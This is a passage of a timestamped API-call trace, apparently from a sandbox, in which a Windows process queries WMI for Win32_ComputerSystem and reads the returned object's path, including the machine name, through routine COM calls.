	[0263.345] WbemLocator:IUnknown:AddRef (This=0x627213c) returned 0x3
	[0263.345] IWbemServices:ExecQuery (in: This=0x627213c, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x5eae620 | out: ppEnum=0x5eae620*=0x6275074) returned 0x0
	[0263.377] IUnknown:QueryInterface (in: This=0x6275074, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2cc | out: ppvObject=0x5eae2cc*=0x6275078) returned 0x0
	[0263.378] IClientSecurity:QueryBlanket (in: This=0x6275078, pProxy=0x6275074, pAuthnSvc=0x5eae314, pAuthzSvc=0x5eae310, pServerPrincName=0x5eae320, pAuthnLevel=0x5eae318, pImpLevel=0x5eae304, pAuthInfo=0x5eae308, pCapabilites=0x5eae30c | out: pAuthnSvc=0x5eae314*=0xa, pAuthzSvc=0x5eae310*=0x0, pServerPrincName=0x5eae320, pAuthnLevel=0x5eae318*=0x6, pImpLevel=0x5eae304*=0x2, pAuthInfo=0x5eae308, pCapabilites=0x5eae30c*=0x1) returned 0x0
	[0263.378] IUnknown:Release (This=0x6275078) returned 0x1
	[0263.378] IUnknown:QueryInterface (in: This=0x6275074, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2c0 | out: ppvObject=0x5eae2c0*=0x3ba1cc) returned 0x0
	[0263.378] IUnknown:QueryInterface (in: This=0x6275074, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2bc | out: ppvObject=0x5eae2bc*=0x6275078) returned 0x0
	[0263.378] IClientSecurity:SetBlanket (This=0x6275078, pProxy=0x6275074, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0263.388] IUnknown:Release (This=0x6275078) returned 0x2
	[0263.388] WbemLocator:IUnknown:Release (This=0x3ba1cc) returned 0x1
	[0263.388] CoTaskMemFree (pv=0x3acd50) 
	[0263.389] WbemLocator:IUnknown:Release (This=0x627213c) returned 0x2
	[0263.389] IUnknown:QueryInterface (in: This=0x6275074, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc78 | out: ppvObject=0x5eadc78*=0x3ba1cc) returned 0x0
	[0263.389] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba1cc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadc34 | out: ppvObject=0x5eadc34*=0x0) returned 0x80004002
	[0263.392] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba1cc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadb28 | out: ppvObject=0x5eadb28*=0x0) returned 0x80004002
	[0263.393] WbemLocator:IUnknown:AddRef (This=0x3ba1cc) returned 0x3
	[0263.393] CoGetContextToken (in: pToken=0x5eadac0 | out: pToken=0x5eadac0) returned 0x0
	[0263.393] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba1cc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadaa8 | out: ppvObject=0x5eadaa8*=0x3ba12c) returned 0x0
	[0263.394] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3ba12c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadab0 | out: pCid=0x5eadab0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.394] WbemLocator:IUnknown:Release (This=0x3ba12c) returned 0x3
	[0263.394] CoGetContextToken (in: pToken=0x5eadab8 | out: pToken=0x5eadab8) returned 0x0
	[0263.394] WbemLocator:IUnknown:AddRef (This=0x3ba1cc) returned 0x4
	[0263.394] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba1cc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadb2c | out: ppvObject=0x5eadb2c*=0x3ba1b4) returned 0x0
	[0263.394] WbemLocator:IUnknown:Release (This=0x3ba1cc) returned 0x4
	[0263.394] WbemLocator:IRpcOptions:Query (in: This=0x3ba1b4, pPrx=0x3ba1cc, dwProperty=2, pdwValue=0x5eadb50 | out: pdwValue=0x5eadb50) returned 0x80004002
	[0263.394] WbemLocator:IUnknown:Release (This=0x3ba1b4) returned 0x3
	[0263.395] WbemLocator:IUnknown:Release (This=0x3ba1cc) returned 0x2
	[0263.395] CoGetContextToken (in: pToken=0x5eadf2c | out: pToken=0x5eadf2c) returned 0x0
	[0263.395] CoGetContextToken (in: pToken=0x5eadeec | out: pToken=0x5eadeec) returned 0x0
	[0263.395] WbemLocator:IUnknown:AddRef (This=0x3ba1cc) returned 0x3
	[0263.395] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba1cc, riid=0x5eadf68*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eadf64 | out: ppvObject=0x5eadf64*=0x6275074) returned 0x0
	[0263.395] WbemLocator:IUnknown:Release (This=0x3ba1cc) returned 0x3
	[0263.395] IUnknown:Release (This=0x6275074) returned 0x2
	[0263.395] IUnknown:Release (This=0x6275074) returned 0x1
	[0263.396] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6272088, puCount=0x5eae8b8 | out: puCount=0x5eae8b8*=0x2) returned 0x0
	[0263.396] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae8b4*=0x0, pszText=0x0 | out: puBuffLength=0x5eae8b4*=0x17, pszText=0x0) returned 0x0
	[0263.396] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae8b4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae8b4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.396] CoGetContextToken (in: pToken=0x5eae254 | out: pToken=0x5eae254) returned 0x0
	[0263.396] CoGetContextToken (in: pToken=0x5eae214 | out: pToken=0x5eae214) returned 0x0
	[0263.396] WbemLocator:IUnknown:AddRef (This=0x3ba1cc) returned 0x2
	[0263.396] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba1cc, riid=0x5eae290*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae28c | out: ppvObject=0x5eae28c*=0x6275074) returned 0x0
	[0263.396] WbemLocator:IUnknown:Release (This=0x3ba1cc) returned 0x2
	[0263.396] IUnknown:AddRef (This=0x6275074) returned 0x3
	[0263.396] IEnumWbemClassObject:Clone (in: This=0x6275074, ppEnum=0x5eae888 | out: ppEnum=0x5eae888*=0x627513c) returned 0x0
	[0263.402] IUnknown:QueryInterface (in: This=0x627513c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae544 | out: ppvObject=0x5eae544*=0x6275140) returned 0x0
	[0263.402] IClientSecurity:QueryBlanket (in: This=0x6275140, pProxy=0x627513c, pAuthnSvc=0x5eae58c, pAuthzSvc=0x5eae588, pServerPrincName=0x5eae598, pAuthnLevel=0x5eae590, pImpLevel=0x5eae57c, pAuthInfo=0x5eae580, pCapabilites=0x5eae584 | out: pAuthnSvc=0x5eae58c*=0xa, pAuthzSvc=0x5eae588*=0x0, pServerPrincName=0x5eae598, pAuthnLevel=0x5eae590*=0x6, pImpLevel=0x5eae57c*=0x2, pAuthInfo=0x5eae580, pCapabilites=0x5eae584*=0x1) returned 0x0
	[0263.402] IUnknown:Release (This=0x6275140) returned 0x1
	[0263.402] IUnknown:QueryInterface (in: This=0x627513c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae538 | out: ppvObject=0x5eae538*=0x3ba49c) returned 0x0
	[0263.402] IUnknown:QueryInterface (in: This=0x627513c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae534 | out: ppvObject=0x5eae534*=0x6275140) returned 0x0
	[0263.402] IClientSecurity:SetBlanket (This=0x6275140, pProxy=0x627513c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0263.406] IUnknown:Release (This=0x6275140) returned 0x2
	[0263.406] WbemLocator:IUnknown:Release (This=0x3ba49c) returned 0x1
	[0263.406] CoTaskMemFree (pv=0x3acdb0) 
	[0263.406] IUnknown:Release (This=0x6275074) returned 0x2
	[0263.407] IUnknown:QueryInterface (in: This=0x627513c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadee0 | out: ppvObject=0x5eadee0*=0x3ba49c) returned 0x0
	[0263.408] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba49c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eade9c | out: ppvObject=0x5eade9c*=0x0) returned 0x80004002
	[0263.410] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba49c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadd90 | out: ppvObject=0x5eadd90*=0x0) returned 0x80004002
	[0263.411] WbemLocator:IUnknown:AddRef (This=0x3ba49c) returned 0x3
	[0263.411] CoGetContextToken (in: pToken=0x5eadd28 | out: pToken=0x5eadd28) returned 0x0
	[0263.411] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba49c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadd10 | out: ppvObject=0x5eadd10*=0x3ba3fc) returned 0x0
	[0263.411] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3ba3fc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadd18 | out: pCid=0x5eadd18*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.411] WbemLocator:IUnknown:Release (This=0x3ba3fc) returned 0x3
	[0263.411] CoGetContextToken (in: pToken=0x5eadd20 | out: pToken=0x5eadd20) returned 0x0
	[0263.411] WbemLocator:IUnknown:AddRef (This=0x3ba49c) returned 0x4
	[0263.412] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba49c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadd94 | out: ppvObject=0x5eadd94*=0x3ba484) returned 0x0
	[0263.412] WbemLocator:IUnknown:Release (This=0x3ba49c) returned 0x4
	[0263.412] WbemLocator:IRpcOptions:Query (in: This=0x3ba484, pPrx=0x3ba49c, dwProperty=2, pdwValue=0x5eaddb8 | out: pdwValue=0x5eaddb8) returned 0x80004002
	[0263.412] WbemLocator:IUnknown:Release (This=0x3ba484) returned 0x3
	[0263.412] WbemLocator:IUnknown:Release (This=0x3ba49c) returned 0x2
	[0263.412] CoGetContextToken (in: pToken=0x5eae194 | out: pToken=0x5eae194) returned 0x0
	[0263.412] CoGetContextToken (in: pToken=0x5eae154 | out: pToken=0x5eae154) returned 0x0
	[0263.412] WbemLocator:IUnknown:AddRef (This=0x3ba49c) returned 0x3
	[0263.413] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba49c, riid=0x5eae1d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae1cc | out: ppvObject=0x5eae1cc*=0x627513c) returned 0x0
	[0263.413] WbemLocator:IUnknown:Release (This=0x3ba49c) returned 0x3
	[0263.413] IUnknown:Release (This=0x627513c) returned 0x2
	[0263.413] IUnknown:Release (This=0x627513c) returned 0x1
	[0263.413] CoGetContextToken (in: pToken=0x5eae788 | out: pToken=0x5eae788) returned 0x0
	[0263.413] CoGetContextToken (in: pToken=0x5eae748 | out: pToken=0x5eae748) returned 0x0
	[0263.413] WbemLocator:IUnknown:AddRef (This=0x3ba49c) returned 0x2
	[0263.413] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba49c, riid=0x5eae7c4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae7c0 | out: ppvObject=0x5eae7c0*=0x627513c) returned 0x0
	[0263.413] WbemLocator:IUnknown:Release (This=0x3ba49c) returned 0x2
	[0263.414] IUnknown:AddRef (This=0x627513c) returned 0x3
	[0263.414] IEnumWbemClassObject:Reset (This=0x627513c) returned 0x0
	[0263.419] IUnknown:Release (This=0x627513c) returned 0x2
	[0263.420] CoGetContextToken (in: pToken=0x5eae67c | out: pToken=0x5eae67c) returned 0x0
	[0263.420] IUnknown:AddRef (This=0x627513c) returned 0x3
	[0263.420] IEnumWbemClassObject:Next (in: This=0x627513c, lTimeout=-1, uCount=0x1, apObjects=0x38ef70, puReturned=0x2ff761c | out: apObjects=0x38ef70*=0x626e398, puReturned=0x2ff761c*=0x1) returned 0x0
	[0263.424] IUnknown:QueryInterface (in: This=0x626e398, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc88 | out: ppvObject=0x5eadc88*=0x626e398) returned 0x0
	[0263.424] IUnknown:QueryInterface (in: This=0x626e398, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadc44 | out: ppvObject=0x5eadc44*=0x0) returned 0x80004002
	[0263.424] IUnknown:QueryInterface (in: This=0x626e398, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadb38 | out: ppvObject=0x5eadb38*=0x0) returned 0x80004002
	[0263.425] IUnknown:AddRef (This=0x626e398) returned 0x3
	[0263.425] CoGetContextToken (in: pToken=0x5eadad0 | out: pToken=0x5eadad0) returned 0x0
	[0263.425] IUnknown:QueryInterface (in: This=0x626e398, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadab8 | out: ppvObject=0x5eadab8*=0x626e39c) returned 0x0
	[0263.425] IMarshal:GetUnmarshalClass (in: This=0x626e39c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadac0 | out: pCid=0x5eadac0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0263.425] IUnknown:Release (This=0x626e39c) returned 0x3
	[0263.425] CoGetContextToken (in: pToken=0x5eadac8 | out: pToken=0x5eadac8) returned 0x0
	[0263.425] IUnknown:AddRef (This=0x626e398) returned 0x4
	[0263.425] IUnknown:QueryInterface (in: This=0x626e398, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadb3c | out: ppvObject=0x5eadb3c*=0x0) returned 0x80004002
	[0263.426] IUnknown:Release (This=0x626e398) returned 0x3
	[0263.426] IUnknown:Release (This=0x626e398) returned 0x2
	[0263.426] CoGetContextToken (in: pToken=0x5eadf28 | out: pToken=0x5eadf28) returned 0x0
	[0263.426] CoGetContextToken (in: pToken=0x5eadee8 | out: pToken=0x5eadee8) returned 0x0
	[0263.426] IUnknown:AddRef (This=0x626e398) returned 0x3
	[0263.426] IUnknown:QueryInterface (in: This=0x626e398, riid=0x5eadf64*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5eadf60 | out: ppvObject=0x5eadf60*=0x626e398) returned 0x0
	[0263.426] IUnknown:Release (This=0x626e398) returned 0x3
	[0263.426] IUnknown:Release (This=0x626e398) returned 0x2
	[0263.426] IUnknown:Release (This=0x626e398) returned 0x1
	[0263.427] IUnknown:Release (This=0x627513c) returned 0x2
	[0263.427] CoGetContextToken (in: pToken=0x5eae80c | out: pToken=0x5eae80c) returned 0x0
	[0263.427] IUnknown:AddRef (This=0x626e398) returned 0x2
	[0263.427] IWbemClassObject:Get (in: This=0x626e398, wszName="__GENUS", lFlags=0, pVal=0x5eae888*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5eae93c*=0, plFlavor=0x5eae938*=0 | out: pVal=0x5eae888*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5eae93c*=3, plFlavor=0x5eae938*=64) returned 0x0
	[0263.427] IWbemClassObject:Get (in: This=0x626e398, wszName="__PATH", lFlags=0, pVal=0x5eae868*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5eae920*=0, plFlavor=0x5eae91c*=0 | out: pVal=0x5eae868*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x5eae920*=8, plFlavor=0x5eae91c*=64) returned 0x0
	[0263.427] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0263.427] CoGetObjectContext (in: riid=0x2b3adb0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae8c0 | out: ppv=0x5eae8c0*=0x2d8dec) returned 0x0
	[0263.428] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae8b8 | out: pAptType=0x5eae8b8*=1) returned 0x0
	[0263.428] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2b3ad98*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae8bc | out: ppvObject=0x5eae8bc*=0x0) returned 0x80004002
	[0263.428] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0263.428] CoGetClassObject (in: rclsid=0x38bb74*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae3d8 | out: ppv=0x5eae3d8*=0x6275178) returned 0x0
	[0263.428] WbemDefPath:IUnknown:QueryInterface (in: This=0x6275178, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae208 | out: ppvObject=0x5eae208*=0x0) returned 0x80004002
	[0263.428] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6275178, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae240 | out: ppvObject=0x5eae240*=0x626e7e0) returned 0x0
	[0263.429] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e7e0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadfe4 | out: ppvObject=0x5eadfe4*=0x626e7e0) returned 0x0
	[0263.429] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e7e0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadfa0 | out: ppvObject=0x5eadfa0*=0x0) returned 0x80004002
	[0263.429] WbemDefPath:IUnknown:AddRef (This=0x626e7e0) returned 0x3
	[0263.429] CoGetContextToken (in: pToken=0x5eade2c | out: pToken=0x5eade2c) returned 0x0
	[0263.429] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e7e0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade14 | out: ppvObject=0x5eade14*=0x3bd4a8) returned 0x0
	[0263.430] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x3bd4a8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eade1c | out: pCid=0x5eade1c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.430] WbemDefPath:IUnknown:Release (This=0x3bd4a8) returned 0x3
	[0263.430] CoGetContextToken (in: pToken=0x5eade24 | out: pToken=0x5eade24) returned 0x0
	[0263.430] WbemDefPath:IUnknown:AddRef (This=0x626e7e0) returned 0x4
	[0263.430] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e7e0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade98 | out: ppvObject=0x5eade98*=0x0) returned 0x80004002
	[0263.430] WbemDefPath:IUnknown:Release (This=0x626e7e0) returned 0x3
	[0263.430] WbemDefPath:IUnknown:Release (This=0x626e7e0) returned 0x2
	[0263.430] WbemDefPath:IUnknown:Release (This=0x6275178) returned 0x0
	[0263.430] WbemDefPath:IUnknown:Release (This=0x626e7e0) returned 0x1
	[0263.431] CoGetContextToken (in: pToken=0x5eae6d4 | out: pToken=0x5eae6d4) returned 0x0
	[0263.431] CoGetContextToken (in: pToken=0x5eae694 | out: pToken=0x5eae694) returned 0x0
	[0263.431] WbemDefPath:IUnknown:AddRef (This=0x626e7e0) returned 0x2
	[0263.431] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e7e0, riid=0x5eae710*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae70c | out: ppvObject=0x5eae70c*=0x626e7e0) returned 0x0
	[0263.431] WbemDefPath:IUnknown:Release (This=0x626e7e0) returned 0x2
	[0263.431] WbemDefPath:IUnknown:Release (This=0x626e7e0) returned 0x1
	[0263.431] CoGetContextToken (in: pToken=0x5eae754 | out: pToken=0x5eae754) returned 0x0
	[0263.431] CoGetContextToken (in: pToken=0x5eae714 | out: pToken=0x5eae714) returned 0x0
	[0263.431] WbemDefPath:IUnknown:AddRef (This=0x626e7e0) returned 0x2
	[0263.431] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e7e0, riid=0x5eae790*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae78c | out: ppvObject=0x5eae78c*=0x626e7e0) returned 0x0
	[0263.431] WbemDefPath:IUnknown:Release (This=0x626e7e0) returned 0x2
	[0263.432] WbemDefPath:IUnknown:AddRef (This=0x626e7e0) returned 0x3
	[0263.432] WbemDefPath:IWbemPath:SetText (This=0x626e7e0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0263.432] WbemDefPath:IUnknown:Release (This=0x626e7e0) returned 0x2
	[0263.432] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6272088, puCount=0x5eae8f4 | out: puCount=0x5eae8f4*=0x2) returned 0x0
	[0263.432] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae8f0*=0x0, pszText=0x0 | out: puBuffLength=0x5eae8f0*=0x17, pszText=0x0) returned 0x0
	[0263.432] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
